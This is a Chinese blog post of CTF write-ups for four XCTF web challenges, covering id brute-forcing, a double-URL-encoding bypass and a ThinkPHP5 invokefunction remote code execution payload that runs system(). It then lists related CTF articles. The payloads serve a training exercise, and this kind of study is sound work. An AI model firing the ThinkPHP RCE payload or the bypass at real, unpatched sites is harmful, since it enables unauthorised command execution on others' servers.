攻防世界web进阶区 攻略

最新推荐文章于 2022-07-05 12:33:43 发布
最新推荐文章于 2022-07-05 12:33:43 发布
阅读量586 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46329549/article/details/105027003
版权

进阶题

前言:

web进阶区题目相对于新手区较难,此博客只是记录了一些比较重要或者
有代表性的题目,比较难的题暂时不会解,以后还会有补充。

1.isc-06

这道题用到了对id参数进行爆破。进入题目后看到url后存在参数id,使用各种注入方式后均没有爆破成功,最后使用bp对id参数进行爆破
在这里插入图片描述
进入报表中心,看到url
在这里插入图片描述
用bp爆破id,id=2334时有变化,查看response,找到flag。
在这里插入图片描述

2.php2

题目提示进入index.php页面,查看源代码,
在这里插入图片描述
大意就是id进行 urldecode()后等于 admin,由于浏览器会自动 进行一次解码,所以需要进行两次加密

第一次:%61%64%6d%69%6e
第二次:%2561%2564%256d%2569%256e
payload: ?id=%2561%2564%256d%2569%256e

cyberpeace{08408ed7908adc72cc8b92ad9d7cc31e}

3.baby_web

题目直接就提示了初始页面,那么直接江url改为index.php,然后就自动跳转到1.php,然后使用burp suite抓index.php的包,在请求头看到了flag
flag{very_baby_web}

4.php-rce

这道题用到了thinkphp5 远程命令执行漏洞,具体内容可以百度
这个是payload:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(“cat%20…/…/…/flag”);%27

flag{thinkphp5_rce}

ZSL13213636450
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界 web进阶笔记
weixin_43928140的博客
06-03 1822
0x02 NaNNaNNaNNaN-Batman 首先下载附件得到web100,用notepad++打开看下,是一些js乱码 我把源码贴到下面 <script>_='function $(){e=getEleById("c").value;length==16^be0f23233ace98aa$c7be9){tfls_aie}na_h0lnrg...
攻防世界-web高手进阶
zji
04-25 4886
文章目录攻防世界-web高手进阶一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界-WEB进阶-Web_php_wrong_nginx_config
qq_64966153的博客
07-05 1461
攻防世界
[ 攻防世界 ] web进阶
Dannie01的博客
11-23 890
目的:练习做题手感和思路 CAT 搜索框搜索 弹出?url= 猜测是SSRF,所有协议均被过滤 http:// file:/// dict:// gopher:// 回归题目和描述,由CAT联想是命令执行,依然是 invalid url 思路切入点 invalid url => fuzz fuzz是我思路和实践弱项,积累 ?url=%88 宽字节,获取报错信息 html源码 复制粘贴本地查看 看到了熟悉的django报错页面,看来是将输入的参数传到了后端的django服务中进行解析,而d.
攻防世界WEB进阶之Cat
harry_c的博客
08-05 8445
攻防世界WEB进阶之Cat第一步:分析第二步:实操第三步:答案 第一步:分析 难度系数: 2星 题目来源: XCTF 4th-WHCTF-2017 题目描述:抓住那只猫 首先题给出的信息抓住那只猫,没任何提示性,题目来源为XCTF,点击场景,打开为一个输入页面: 提示输入域名,测试题给的域名loli.club,无任何响应,但是查询的内容出现在搜索框中为get请求,再测试127.0.0.1,巧了,返...
攻防世界—-(web进阶)FlatScience–WP
12-14
打开题目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: ...(还有一个robots.txt, 打开之后也是指向上面两个页面的) ... 查看页面源代码 有提示,就先暂时先不考虑弱口令 ...
web-hacking-101
04-25
本教程将带你走进这个神秘的世界,通过深入浅出的方式讲解Web黑客的基础技能。 首先,你会学习HTTP协议的基础知识,这是所有Web通信的基础。了解HTTP请求方法(如GET、POST、PUT等)以及HTTP头信息如何影响数据传输...
android安全攻防实战
04-15
《Android安全攻防实战》是一本深度探讨Android平台安全性的专著,对于渴望提升自己在Android领域的专业知识,尤其是对安全方面感兴趣的开发者来说,这是一本不可多得的资源。本书由崔孝晨和武晓音两位专家撰写,...
西普WEB大部分题解
12-09
【标题】"西普WEB大部分题解"是一个针对网络安全领域中的Web安全训练平台——西普(CTF)的解题指南。这个资源包含了对西普平台上多种Web安全挑战的解答,旨在帮助那些参与CTF(Capture The Flag)比赛或者希望提升...
计算机网络安全分析和网络攻防SIEM系统建设
最新发布
06-16
网络安全是一个涉及多个领域的广泛话题,...网络安全入门5天速成教程 :百度经验提供的教程,帮助读者快速掌握WEB安全渗透攻防技术。 网络攻防教程 :Bilibili上的教程,从入门到高级,涵盖计算机网络基础到渗透测试。
攻防世界writeup——Web(持续更新)
Lethe's Blog
08-12 8093
lottery(XCTF 4th-QCTF-2018) 打开题目先注册,然后发现flag可以购买。但得先去买彩票赢得足够的钱,七位数字的彩票,猜中的位数越多,赢得的钱越多,因此应该在买彩票这里出了一些漏洞。 1、首先访问目录robots.txt,存在.git泄露。 2、利用工具GitHack,得到网站源码: 3、进行代码审计,问题出现在api.php里的buy函数,这个函数就是用来判断是否猜...
攻防世界web(二)进阶(一)
weixin_43342135的博客
08-18 619
1.Cat 这里做了好久都没有头绪,一开始测完网页的功能之后,就明白了网页是ping(连接ip),于是就用 127.0.0.1&&ls 去尝试查询网页的目录,结果发现被屏蔽了,这里又尝试了127.0.0.1|ls 和 127.0.0.1&&dir 都发现被过滤掉了,于是这里查看别人的writeup, 明白了毛线,说是因为字符超过0x7F的ASCII...
攻防世界 —— Web高手进阶1题(baby_web)题解
Catherine_qingzhu的博客
04-05 1125
解题过程 题目已经提示FLAG在index.php或index.html中了 所以就在浏览器的地址栏中试,结果发现 ...\index.html资源不存在 ...\index.php又会跳转到1.php 这就很迷,然后按F12键调试,重新在地址栏中输入...\index.php 看到Network中是介个样子 index.php返回的状态码是302,我们点击index.php看看这...
攻防世界——app漏洞第二题
qq_33356474的博客
05-28 1516
攻防世界——app漏洞第二题 拿到android题,就先在模拟器中运行一下,看看具体是怎样实现的 在模拟器中看到的是上面这样的运行效果,估计就是和我们输入的两个部分有关吧。于是直接反汇编,看看反汇编的代码。 上jeb 发现是有两个活动存在,在注册表中也 明确写过。那么我们就看看这两个活动 是怎样运行的。 mainActivity的主要内容,发现是有两个输...
攻防世界——web进阶
yxl_d的博客
09-25 391
前记 瞅瞅进阶的,继续总结。 1.NaNNaNNaNNaN-Batman 打开题目并下载附件 有乱码但看到<script>等标签的,后缀名改为html查看 毫无头绪,查看wp发现 整理下弹框内容发现 直接将下面代码复制到控制台执行 var t=["fl","s_a","i","e}"]; var n=["a","_h0l","n"]; var r=["g{","e","_0...
攻防世界 四(进阶篇)catch-me
sjt670994562的博客
06-13 1427
后来做题速度完全掉了下去,主要是因为基础太差,不管是c、python语言基础,还是汇编基础,还是linux使用,shell脚本的编写,都差太多,所以经过这几天的冲刺,我打算从基础开始,不急于求成,题会做,但不会那么着急了,太急了学的东西也是没用的,这是这几天卡在这道题上,以及同学对我的一些批评总结出来的一些观点。 catch-me 分析,不是elf不是exe,扔到C32Asm,看到头文件 FD 3...
攻防世界 高手进阶 web cat
weixin_30709635的博客
08-16 231
php cURLCURLOPT_SAFE_UPLOAD django DEBUG mode Django使用的是gbk编码,超过%F7的编码不在gbk中有意义 当CURLOPT_SAFE_UPLOAD为 true 时,如果在请求前面加上@的话phpcurl组件是会把后面的当作绝对路径请求,来读取文件。当且仅当文件中存在中文字符的时候,Django 才会报错导致获取文件内容...
攻防世界——web新手和引导模式(全解)
热门推荐
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
攻防世界misc 高手进阶 (慢慢更
weixin_43928140的博客
05-29 5272
菜鸡生活某一天 0x 01 Excaliflag 毕竟第一题嘛 肯定不难得 只要你想得到 他就不会难的 所以这个题目直接给思路啦 神器stegSolve 加油姐妹 0x 02 签到题 base64很明显,先解密得到 ggQ@gQ1fqh0ohtjpt_sw{gfhgs#} 然后猜到有栅栏了,但是发现都没用,所以栅栏前面肯定还有,后面发现是凯撒 所以这个就自己去试一下把,先凯撒再栅栏,注意大小...
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值